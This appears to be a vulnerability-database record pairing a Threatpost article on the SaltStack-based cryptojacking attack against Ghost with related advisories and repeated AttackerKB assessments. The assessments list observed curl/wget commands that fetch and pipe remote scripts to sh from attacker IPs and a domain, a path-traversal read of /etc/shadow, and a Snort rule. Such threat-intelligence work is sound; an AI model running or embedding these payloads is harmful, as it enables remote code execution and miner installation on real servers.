{"id": "THREATPOST:A1F6C89E2D2F2205B93C6727C24B908C", "type": "threatpost", "bulletinFamily": "info", "title": "Hackers Exploit Critical Flaw in Ghost Platform with Cryptojacking Attack", "description": "Hackers targeted the publishing platform Ghost over the weekend, launching a cryptojacking attack against its servers that led to widespread outages. The attack stemmed from the exploit of critical [vulnerabilities in ](<https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/>)[SaltStack](<https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/>), used in Ghost\u2019s server management infrastructure.\n\nGhost is a free, open-source blogging platform with an install base of over 2 million, including big-name customers like Mozilla and DuckDuckGo. The company, which touts itself as an alternative to platforms like WordPress, Medium and Tumblr, first posted on Sunday at 3:24 BST that customers were experiencing service outages. It has since fixed the issue and systems are up and running again, as of Monday.\n\nUpon further investigation, Ghost said that the hack stemmed from attackers exploiting two flaws, [CVE-2020-11651](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11651>) and[ CVE-2020-11652](<https://nvd.nist.gov/vuln/detail/CVE-2020-11652>), which allow full remote code execution as root on servers in data centers and cloud environments. The two flaws specifically exist in SaltStack\u2019s open-source Salt management framework, used by customers like Ghost as an [open-source configuration tool](<https://github.com/saltstack/salt>) to monitor and update the state of their servers.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cAll traces of the crypto-mining virus were successfully eliminated yesterday, all systems remain stable, and we have not discovered any further concerns or issues on our network,\u201d according to Ghost\u2019s [announcement](<https://status.ghost.org/>) on its status update page. \u201cThe team is now working hard on remediation to clean and rebuild our entire network. We will keep this incident open and continue to share updates until it is fully resolved. We will also be contacting all customers directly to notify them of the incident, and publishing a public post-mortem later this week.\u201d\n\nCVE-2020-11651 is an authentication bypass issue, while CVE-2020-11652 is a directory-traversal flaw where untrusted input (i.e. parameters in network requests) is not sanitized correctly. This in turn allows access to the entire filesystem of the master server, researchers found.\n\nSaltStack has released patches for the flaw in [release 3000.2](<https://lists.opensuse.org/opensuse-security-announce/2020-04/msg00047.html>), on April 30 \u2013 however, researchers with F-Secure, who discovered the flaw, said a preliminary scan revealed more than 6,000 potentially vulnerable Salt instances exposed to the public internet. As such, researchers warned that they expect in-the-wild attacks to be launched against the flaws imminently.\n\nIt appears that some of those vulnerable Salt instances belonged to Ghost. After exploiting the flaws, attackers were able launch a cryptocurrency mining attack, which in turn spiked CPU usage and overloaded systems. Both Ghost Pro sites and Ghost.org billing services were affected \u2013 though Ghost said that credit card data was not affected. Ghost said that a fix has been implemented and that additional firewall configurations are now running.\n\n\u201cAt this time there is no evidence of any attempts to access any of our systems or data,\u201d according to Ghost. \u201cNevertheless, all sessions, passwords and keys are being cycled and all servers are being re-provisioned.\u201d\n\nAlex Peay, senior vice president of Product at SaltStack, told Threatpost that \u201cupon notification of the CVE, SaltStack took immediate action to remediate the vulnerability, develop and issue patches, and communicate to our customers about the affected versions so they can prepare their systems for update.\u201d\n\n\u201cWe must reinforce how critical it is that all Salt users patch their systems and follow the guidance we have provided outlining steps for remediation and best practices for Salt environment security,\u201d Peay said. \u201cIt is equally important to upgrade to latest versions of the platform and register with support for future awareness of any possible issues and remediations.\u201d\n\nThreatpost has reached out to Ghost for further comment.\n\n**_Inbox security is your best defense against today\u2019s fastest growing security threat \u2013 phishing and Business Email Compromise attacks. _**[**_On May 13 at 2 p.m. ET_**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_, join Valimail security experts and Threatpost for a FREE webinar, _**[**_5 Proven Strategies to Prevent Email Compromise_**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_. Get exclusive insights and advanced takeaways on how to lockdown your inbox to fend off the latest phishing and BEC assaults. Please _**[**_register here _**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_for this sponsored webinar._**\n\n_**Also, don\u2019t miss our latest on-demand webinar from DivvyCloud and Threatpost, **_[_**A Practical Guide to Securing the Cloud in the Face of Crisis**_](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_**, with critical, advanced takeaways on how to avoid cloud disruption and chaos.**_\n", "published": "2020-05-04T19:23:41", "modified": "2020-05-04T19:23:41", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://threatpost.com/hackers-exploit-critical-flaw-in-ghost-platform-with-cryptojacking-attack/155431/", "reporter": "Lindsey O'Donnell", "references": ["https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/", "https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11651", "https://nvd.nist.gov/vuln/detail/CVE-2020-11652", "https://github.com/saltstack/salt", "https://threatpost.com/newsletter-sign/", "https://status.ghost.org/", "https://lists.opensuse.org/opensuse-security-announce/2020-04/msg00047.html", "https://register.gotowebinar.com/register/5064791868226032141?source=ART", "https://register.gotowebinar.com/register/5064791868226032141?source=ART", "https://register.gotowebinar.com/register/5064791868226032141?source=ART", "https://attendee.gotowebinar.com/register/4136632530104301068?source=art"], "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "lastseen": "2020-10-02T21:54:30", "viewCount": 103, "enchantments": {"dependencies": {"references": [{"type": "vmware", "idList": ["VMSA-2020-0009.1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-11652", "UB:CVE-2020-11651"]}, {"type": "attackerkb", "idList": ["AKB:C751071A-7880-42C8-A7D3-732A54F317B3", "AKB:C964B102-C1A8-42E7-AE93-2D5FCBAD769C", "AKB:87D730E9-750C-46D0-8C95-7F3FC0F5847C"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-11652", "RH:CVE-2020-11651"]}, {"type": "cve", "idList": ["CVE-2020-11651", "CVE-2020-11652"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-2223.NASL", "SALTSTACK_3000_2_MULTIPLE_VULNERABILITIES.NASL", "FREEBSD_PKG_6BF55AF9973B11EA9F2C38D547003487.NASL", "PHOTONOS_PHSA-2020-1_0-0294_SALT3.NASL", "SUSE_SU-2020-1151-1.NASL", "OPENSUSE-2020-564.NASL", "SUSE_SU-2020-1150-1.NASL", "PHOTONOS_PHSA-2020-1_0-0294_SALT.NASL", "PHOTONOS_PHSA-2020-3_0-0091_SALT3.NASL", "SUSE_SU-2020-1973-1.NASL"]}, {"type": "thn", "idList": ["THN:8E401822CBD35E8E7CCE9E5DD922A70E", "THN:00FCCD16591B1900512E0B089F2A6BC8"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:B6B667B4ABD56B3892526FAB5B6C9F2D"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/MISC/SALTSTACK_SALT_UNAUTH_RCE"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0564-1", "OPENSUSE-SU-2021:2106-1", "OPENSUSE-SU-2021:0899-1", "OPENSUSE-SU-2020:1074-1"]}, {"type": "zdt", "idList": ["1337DAY-ID-34423", "1337DAY-ID-34389", "1337DAY-ID-34358"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20200715-01-SALT"]}, {"type": "archlinux", "idList": ["ASA-202005-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157678", "PACKETSTORM:157560"]}, {"type": "freebsd", "idList": ["6BF55AF9-973B-11EA-9F2C-38D547003487"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704676", "OPENVAS:1361412562310892223", "OPENVAS:1361412562310853131"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2223-1:998E3", "DEBIAN:DSA-4676-2:0B1C8", "DEBIAN:DSA-4676-1:8BF11"]}, {"type": "cisa", "idList": ["CISA:6A06982A8847F277D71953FBD9CA4A0E"]}, {"type": "exploitdb", "idList": ["EDB-ID:48421"]}, {"type": "cisco", "idList": ["CISCO-SA-SALT-2VX545AG"]}, {"type": "threatpost", "idList": ["THREATPOST:5CB5F29FA05D52DEEC4D54AA46EB9235", "THREATPOST:64DC6B60F693E46DD314DB70A547D319"]}, {"type": "ubuntu", "idList": ["USN-4459-1"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:54F1D96262CFC427DBA32564C2E47A77"]}], "modified": "2020-10-02T21:54:30", "rev": 2}, "score": {"value": 5.5, "vector": "NONE", "modified": "2020-10-02T21:54:30", "rev": 2}, "vulnersScore": 5.5}, "immutableFields": [], "cvss2": {}, "cvss3": {}}

{"vmware": [{"lastseen": "2021-07-26T17:02:16", "bulletinFamily": "software", "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "description": "##### **1\\. Impacted Products**\n\nvRealize Operations Application Remote Collector (ARC)\n\n##### **2\\. Introduction**\n\nTwo vulnerabilities were disclosed in Salt, an open source project by SaltStack, which have been determined to affect vRealize Operations Application Remote Collector (ARC). Patches and Workarounds are available to address these vulnerabilities in affected VMware products.\n\n##### **3\\. vRealize Operations Application Remote Collector (ARC) addresses Authentication Bypass (CVE-2020-11651) and Directory Traversal (CVE-2020-11652) vulnerabilities.**\n\n**Description**\n\nThe Application Remote Collector (ARC) introduced with vRealize Operations 7.5 utilizes Salt which is affected by CVE-2020-11651 and CVE-2020-11652. VMware has evaluated CVE-2020-11651 (Authentication Bypass) to be in the Critical severity range with a maximum CVSSv3 base score of 10.0 and CVE-2020-11652 (Directory Traversal) to be in the Important severity range with a maximum CVSSv3 base score of 7.5.\n\n**Known Attack Vectors**\n\nCVE-2020-11651 (Authentication Bypass) may allow a malicious actor with network access to port 4505 or 4506 on the ARC to take control of the ARC and any Virtual Machines the ARC may have deployed a Telegraf agent to. CVE-2020-11652 (Directory Traversal) may allow a malicious actor with network access to port 4505 or 4506 on the ARC to access the entirety of the ARC filesystem.\n\n**Resolution**\n\nTo remediate CVE-2020-11651 and CVE-2020-11652 apply the patches listed in the 'Fixed Version' column of the 'Response Matrix' below to affected ARC deployments.\n\n**Workarounds**\n\nWorkarounds for CVE-2020-11651 and CVE-2020-11652 have been documented in the VMware Knowledge Base article listed in the \"Workarounds\" column of the \"Response Matrix\" below.\n\n**Additional Documentation**\n\nPatches for CVE-2020-11651 and CVE-2020-11652 must be manually applied directly to affected ARC deployments. Instructions for doing so have been added to KB79031.\n\n**Notes**\n\nNone.\n\n**Acknowledgements**\n\nNone.\n\n", "modified": "2020-05-15T00:00:00", "published": "2020-05-08T00:00:00", "id": "VMSA-2020-0009.1", "href": "https://www.vmware.com/security/advisories/VMSA-2020-0009.1.html", "type": "vmware", "title": "vRealize Operations Application Remote Collector (ARC) addresses Authentication Bypass and Directory Traversal vulnerabilities (CVE-2020-11651, CVE-2020-11652)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhatcve": [{"lastseen": "2021-06-10T14:38:53", "bulletinFamily": "info", "cvelist": ["CVE-2020-11652"], "description": "A flaw was found in salt. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.\n#### Mitigation\n\nMitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability. \n\n", "modified": "2021-06-10T14:14:36", "published": "2020-05-06T17:40:11", "id": "RH:CVE-2020-11652", "href": "https://access.redhat.com/security/cve/cve-2020-11652", "type": "redhatcve", "title": "CVE-2020-11652", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-06-16T05:41:10", "bulletinFamily": "info", "cvelist": ["CVE-2020-11651"], "description": "An authentication bypass vulnerability was found in Salt, where it is susceptible to arbitrary code execution when processing unauthenticated requests by the ClearFuncs class. This flaw allows an attacker to execute arbitrary code on Salt minions as root.\n#### Mitigation\n\nRed Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update as soon as possible. \n\n", "modified": "2021-06-16T01:45:16", "published": "2020-05-06T17:39:55", "id": "RH:CVE-2020-11651", "href": "https://access.redhat.com/security/cve/cve-2020-11651", "type": "redhatcve", "title": "CVE-2020-11651", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2021-06-30T21:39:14", "bulletinFamily": "info", "cvelist": ["CVE-2020-11652"], "description": "An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before\n3000.2. The salt-master process ClearFuncs class allows access to some\nmethods that improperly sanitize paths. These methods allow arbitrary\ndirectory access to authenticated users.\n\n#### Bugs\n\n * <https://bugs.launchpad.net/ubuntu/+source/salt-minion/+bug/1883658>\n", "modified": "2020-04-30T00:00:00", "published": "2020-04-30T00:00:00", "id": "UB:CVE-2020-11652", "href": "https://ubuntu.com/security/CVE-2020-11652", "type": "ubuntucve", "title": "CVE-2020-11652", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-06-30T21:39:14", "bulletinFamily": "info", "cvelist": ["CVE-2020-11651"], "description": "An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before\n3000.2. The salt-master process ClearFuncs class does not properly validate\nmethod calls. This allows a remote user to access some methods without\nauthentication. These methods can be used to retrieve user tokens from the\nsalt master and/or run arbitrary commands on salt minions.\n\n#### Bugs\n\n * <https://bugs.launchpad.net/ubuntu/+source/salt-minion/+bug/1883658>\n", "modified": "2020-04-30T00:00:00", "published": "2020-04-30T00:00:00", "id": "UB:CVE-2020-11651", "href": "https://ubuntu.com/security/CVE-2020-11651", "type": "ubuntucve", "title": "CVE-2020-11651", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2021-07-22T08:54:20", "description": "An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.", "edition": 17, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-04-30T17:15:00", "title": "CVE-2020-11652", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:debian:debian_linux:10.0", "cpe:/o:opensuse:leap:15.1", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2020-11652", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-11652", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-07-22T08:54:20", "description": "An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.", "edition": 16, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-30T17:15:00", "title": "CVE-2020-11651", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:debian:debian_linux:10.0", "cpe:/o:opensuse:leap:15.1", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2020-11651", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-11651", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2021-07-20T20:15:11", "description": "An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.\n\n \n**Recent assessments:** \n \n**kevthehermit** at May 01, 2020 8:19pm UTC reported:\n\n#### Overview\n\nFor Salt Master before 2019.2.4 and 3000 before 3000.2 there is potential for RCE as root.\n\nIf a salt-master has its ZeroMQ ports `4506` exposed to the public it is possible for an unauthenticated user to gain access to the root_key. With access to the root key it is possible to run a wide range of salt commands that include file read, file write and command execution. These commands can be executed on the salt-master and any minion that is connected.\n\nThis requires multiple socket requests. one to read the key and then additional requests to create jobs.\n\n#### Proof Of Concept\n\nThis POC was tested on SaltStack 2019.2.0\n\nAs of the time of writing this assessment I have been able to create a functional exploit POC. The Code can be found here \u2013 <https://github.com/kevthehermit/CVE-2020-11651>\n\nThe POC and others I am sure will appear shortly has the following functionality\n\n * Read the root key \n\n * Read and Write files on the Salt Master \n\n * Construct a payload to gain full RCE as root on any connected Minion \n\n\nThis took several hours and is \u201ceasy\u201d with the available information and access to a test instance. Details on the discovery process can be found on our blog \u2013 <https://immersivelabs.com/2020/05/06/hackers-are-currently-attacking-vulnerable-saltstack-systems/>\n\n#### Mitigations:\n\nPatch to the latest versions and do not expose theses ports to the external network.\n\n#### Detections\n\nexamine `/var/cache/salt/master/jobs/` on the salt master for a listing of all jobs. the `return.p` file in these dirs will contain a detailed description of the request and the response. This data is serialised.\n\nImmersive Labs have released a basic python script to parse all these job files \u2013 <https://immersivelabs.com/2020/05/06/how-to-lock-onto-the-hackers-targeting-saltstack-minions/>\n \n \n # cat /var/cache/salt/master/jobs/65/6e5fa0837ca5f3d391c4d70d345ee25baed089b970a78a934709e80d083f95/7a5388b6a882_master/return.p\n \ufffd\ufffdreturn\ufffd\ufffdfun\ufffdwheel.file_roots.read\ufffdjid\ufffd20200501195107225222\ufffduser\ufffdUNKNOWN\ufffdfun_args\ufffd\ufffd../../../../etc/shadow\ufffd\ufffdsaltenv\ufffdbase\ufffd_stamp\ufffd2020-05-01T19:51:07.229260\ufffdreturn\ufffd\ufffd\ufffd /srv/salt/../../../../etc/shadow\ufffd\ufffdroot:!::0:::::\n bin:!::0:::::\n daemon:!::0:::::\n adm:!::0:::::\n lp:!::0:::::\n sync:!::0:::::\n shutdown:!::0:::::\n halt:!::0:::::\n mail:!::0:::::\n news:!::0:::::\n uucp:!::0:::::\n operator:!::0:::::\n man:!::0:::::\n postmaster:!::0:::::\n cron:!::0:::::\n ftp:!::0:::::\n sshd:!::0:::::\n at:!::0:::::\n squid:!::0:::::\n xfs:!::0:::::\n games:!::0:::::\n postgres:!::0:::::\n cyrus:!::0:::::\n vpopmail:!::0:::::\n ntp:!::0:::::\n smmsp:!::0:::::\n guest:!::0:::::\n nobody:!::0:::::\n salt:!:18164:0:99999:7:::\n \n \n\nSnort Rule:\n\n`alert tcp $EXTERNAL_NET any -> $HOME_NET 4506 (msg:\"Salt Stack root_key read attempt\"; content:\"_prep_auth_info\"; sid:1000000; rev:1;)`\n\nOn the wire it looks a bit like this so a stronger rule can be created \n`b'\\x82\\xa3enc\\xa5clear\\xa4load\\x81\\xa3cmd\\xaf_prep_auth_info'`\n\n#### In the wild\n\nThe following IPS have been observed sending malicious payloads. other IPS have been seen scanning.\n\n * 95.181.178.108 \n\n * 89.151.132.112 \n\n * 89.27.255.58 \n\n * 104.244.76.189 \n\n * 95.213.139.92 \n\n * 81.92.218.74 \n\n * 178.44.87.133 \n\n\n#### Payloads\n\nThe following Payloads have been observed\n\n * `(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh` \n\n * `import subprocess;subprocess.call(\\\"(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh\\\",shell=True)` \n\n * `/bin/sh -c '(wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://94.253.90.22:44444/ || curl -fs --connect-timeout 5 -m10 --retry 3 http://94.253.90.22:44444/)|sh -s -- 94.253.90.22:44445 G9/kjA/vdOSlUG3q+lz6DZwzr0rgiNWRfbb2UZcnYgmUY01gHW5tQrS6SgjiN/6doZfjvmc='` \n\n * `(curl -s anagima3.top/sa.sh||wget -q -O- anagima3.top/sa.sh)|sh` \n\n * `(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh` \n\n * `(curl -s 176.104.3.35/?6920||wget -q -O- 176.104.3.35/?6920)|sh` \n\n * `/bin/sh -c 'wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://217.25.227.174:44444/?i=[redacted_ip]` \n\n\n**hrbrmstr** at May 04, 2020 10:40am UTC reported:\n\n#### Overview\n\nFor Salt Master before 2019.2.4 and 3000 before 3000.2 there is potential for RCE as root.\n\nIf a salt-master has its ZeroMQ ports `4506` exposed to the public it is possible for an unauthenticated user to gain access to the root_key. With access to the root key it is possible to run a wide range of salt commands that include file read, file write and command execution. These commands can be executed on the salt-master and any minion that is connected.\n\nThis requires multiple socket requests. one to read the key and then additional requests to create jobs.\n\n#### Proof Of Concept\n\nThis POC was tested on SaltStack 2019.2.0\n\nAs of the time of writing this assessment I have been able to create a functional exploit POC. The Code can be found here \u2013 <https://github.com/kevthehermit/CVE-2020-11651>\n\nThe POC and others I am sure will appear shortly has the following functionality\n\n * Read the root key \n\n * Read and Write files on the Salt Master \n\n * Construct a payload to gain full RCE as root on any connected Minion \n\n\nThis took several hours and is \u201ceasy\u201d with the available information and access to a test instance. Details on the discovery process can be found on our blog \u2013 <https://immersivelabs.com/2020/05/06/hackers-are-currently-attacking-vulnerable-saltstack-systems/>\n\n#### Mitigations:\n\nPatch to the latest versions and do not expose theses ports to the external network.\n\n#### Detections\n\nexamine `/var/cache/salt/master/jobs/` on the salt master for a listing of all jobs. the `return.p` file in these dirs will contain a detailed description of the request and the response. This data is serialised.\n\nImmersive Labs have released a basic python script to parse all these job files \u2013 <https://immersivelabs.com/2020/05/06/how-to-lock-onto-the-hackers-targeting-saltstack-minions/>\n \n \n # cat /var/cache/salt/master/jobs/65/6e5fa0837ca5f3d391c4d70d345ee25baed089b970a78a934709e80d083f95/7a5388b6a882_master/return.p\n \ufffd\ufffdreturn\ufffd\ufffdfun\ufffdwheel.file_roots.read\ufffdjid\ufffd20200501195107225222\ufffduser\ufffdUNKNOWN\ufffdfun_args\ufffd\ufffd../../../../etc/shadow\ufffd\ufffdsaltenv\ufffdbase\ufffd_stamp\ufffd2020-05-01T19:51:07.229260\ufffdreturn\ufffd\ufffd\ufffd /srv/salt/../../../../etc/shadow\ufffd\ufffdroot:!::0:::::\n bin:!::0:::::\n daemon:!::0:::::\n adm:!::0:::::\n lp:!::0:::::\n sync:!::0:::::\n shutdown:!::0:::::\n halt:!::0:::::\n mail:!::0:::::\n news:!::0:::::\n uucp:!::0:::::\n operator:!::0:::::\n man:!::0:::::\n postmaster:!::0:::::\n cron:!::0:::::\n ftp:!::0:::::\n sshd:!::0:::::\n at:!::0:::::\n squid:!::0:::::\n xfs:!::0:::::\n games:!::0:::::\n postgres:!::0:::::\n cyrus:!::0:::::\n vpopmail:!::0:::::\n ntp:!::0:::::\n smmsp:!::0:::::\n guest:!::0:::::\n nobody:!::0:::::\n salt:!:18164:0:99999:7:::\n \n \n\nSnort Rule:\n\n`alert tcp $EXTERNAL_NET any -> $HOME_NET 4506 (msg:\"Salt Stack root_key read attempt\"; content:\"_prep_auth_info\"; sid:1000000; rev:1;)`\n\nOn the wire it looks a bit like this so a stronger rule can be created \n`b'\\x82\\xa3enc\\xa5clear\\xa4load\\x81\\xa3cmd\\xaf_prep_auth_info'`\n\n#### In the wild\n\nThe following IPS have been observed sending malicious payloads. other IPS have been seen scanning.\n\n * 95.181.178.108 \n\n * 89.151.132.112 \n\n * 89.27.255.58 \n\n * 104.244.76.189 \n\n * 95.213.139.92 \n\n * 81.92.218.74 \n\n * 178.44.87.133 \n\n\n#### Payloads\n\nThe following Payloads have been observed\n\n * `(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh` \n\n * `import subprocess;subprocess.call(\\\"(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh\\\",shell=True)` \n\n * `/bin/sh -c '(wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://94.253.90.22:44444/ || curl -fs --connect-timeout 5 -m10 --retry 3 http://94.253.90.22:44444/)|sh -s -- 94.253.90.22:44445 G9/kjA/vdOSlUG3q+lz6DZwzr0rgiNWRfbb2UZcnYgmUY01gHW5tQrS6SgjiN/6doZfjvmc='` \n\n * `(curl -s anagima3.top/sa.sh||wget -q -O- anagima3.top/sa.sh)|sh` \n\n * `(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh` \n\n * `(curl -s 176.104.3.35/?6920||wget -q -O- 176.104.3.35/?6920)|sh` \n\n * `/bin/sh -c 'wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://217.25.227.174:44444/?i=[redacted_ip]` \n\n\n**z0r1nga** at April 30, 2020 11:57pm UTC reported:\n\n#### Overview\n\nFor Salt Master before 2019.2.4 and 3000 before 3000.2 there is potential for RCE as root.\n\nIf a salt-master has its ZeroMQ ports `4506` exposed to the public it is possible for an unauthenticated user to gain access to the root_key. With access to the root key it is possible to run a wide range of salt commands that include file read, file write and command execution. These commands can be executed on the salt-master and any minion that is connected.\n\nThis requires multiple socket requests. one to read the key and then additional requests to create jobs.\n\n#### Proof Of Concept\n\nThis POC was tested on SaltStack 2019.2.0\n\nAs of the time of writing this assessment I have been able to create a functional exploit POC. The Code can be found here \u2013 <https://github.com/kevthehermit/CVE-2020-11651>\n\nThe POC and others I am sure will appear shortly has the following functionality\n\n * Read the root key \n\n * Read and Write files on the Salt Master \n\n * Construct a payload to gain full RCE as root on any connected Minion \n\n\nThis took several hours and is \u201ceasy\u201d with the available information and access to a test instance. Details on the discovery process can be found on our blog \u2013 <https://immersivelabs.com/2020/05/06/hackers-are-currently-attacking-vulnerable-saltstack-systems/>\n\n#### Mitigations:\n\nPatch to the latest versions and do not expose theses ports to the external network.\n\n#### Detections\n\nexamine `/var/cache/salt/master/jobs/` on the salt master for a listing of all jobs. the `return.p` file in these dirs will contain a detailed description of the request and the response. This data is serialised.\n\nImmersive Labs have released a basic python script to parse all these job files \u2013 <https://immersivelabs.com/2020/05/06/how-to-lock-onto-the-hackers-targeting-saltstack-minions/>\n \n \n # cat /var/cache/salt/master/jobs/65/6e5fa0837ca5f3d391c4d70d345ee25baed089b970a78a934709e80d083f95/7a5388b6a882_master/return.p\n \ufffd\ufffdreturn\ufffd\ufffdfun\ufffdwheel.file_roots.read\ufffdjid\ufffd20200501195107225222\ufffduser\ufffdUNKNOWN\ufffdfun_args\ufffd\ufffd../../../../etc/shadow\ufffd\ufffdsaltenv\ufffdbase\ufffd_stamp\ufffd2020-05-01T19:51:07.229260\ufffdreturn\ufffd\ufffd\ufffd /srv/salt/../../../../etc/shadow\ufffd\ufffdroot:!::0:::::\n bin:!::0:::::\n daemon:!::0:::::\n adm:!::0:::::\n lp:!::0:::::\n sync:!::0:::::\n shutdown:!::0:::::\n halt:!::0:::::\n mail:!::0:::::\n news:!::0:::::\n uucp:!::0:::::\n operator:!::0:::::\n man:!::0:::::\n postmaster:!::0:::::\n cron:!::0:::::\n ftp:!::0:::::\n sshd:!::0:::::\n at:!::0:::::\n squid:!::0:::::\n xfs:!::0:::::\n games:!::0:::::\n postgres:!::0:::::\n cyrus:!::0:::::\n vpopmail:!::0:::::\n ntp:!::0:::::\n smmsp:!::0:::::\n guest:!::0:::::\n nobody:!::0:::::\n salt:!:18164:0:99999:7:::\n \n \n\nSnort Rule:\n\n`alert tcp $EXTERNAL_NET any -> $HOME_NET 4506 (msg:\"Salt Stack root_key read attempt\"; 